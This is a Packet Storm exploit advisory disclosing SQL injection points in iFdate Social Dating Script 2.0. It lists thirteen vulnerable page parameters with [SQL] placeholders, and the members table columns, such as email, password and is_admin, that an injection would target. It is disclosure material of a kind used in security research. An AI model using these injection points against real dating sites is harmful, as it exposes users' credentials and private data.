iFdate Social Dating Script 2.0 SQL Injection

2017-03-20T00:00:00
ID PACKETSTORM:141694
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-03-20T00:00:00

Description

                                        
                                            `# # # # #  
# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection  
# Google Dork: N/A  
# Date: 18.03.2017  
# Vendor Homepage: http://turnkeycentral.com/  
# Software: http://turnkeycentral.com/scripts/social-dating-script/  
# Demo: http://demo.turnkeycentral.com/ifdate/index.php  
# Version: 2.0  
# Tested on: Win7 x64, Kali Linux x64  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Mail : ihsan[@]ihsan[.]net  
# #ihsansencan  
# # # # #  
# SQL Injection/Exploit :  
# http://localhost/[PATH]/members_search_results.php?gender=[SQL]  
# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]  
# http://localhost/[PATH]/members_search_results.php?marital=[SQL]  
# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]  
# http://localhost/[PATH]/members_search_results.php?country=[SQL]  
# http://localhost/[PATH]/members_search_results.php?picture=[SQL]  
# http://localhost/[PATH]/members_search_results.php?online=[SQL]  
# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]  
# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]  
# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]  
# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]  
# http://localhost/[PATH]/my_profile.php?username=[SQL]  
# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]  
# members :id  
# members :username  
# members :email  
# members :password  
# members :signup_date  
# members :signup_ip  
# members :banned  
# members :active  
# members :is_admin  
# Etc..  
# # # # #  
  
  
`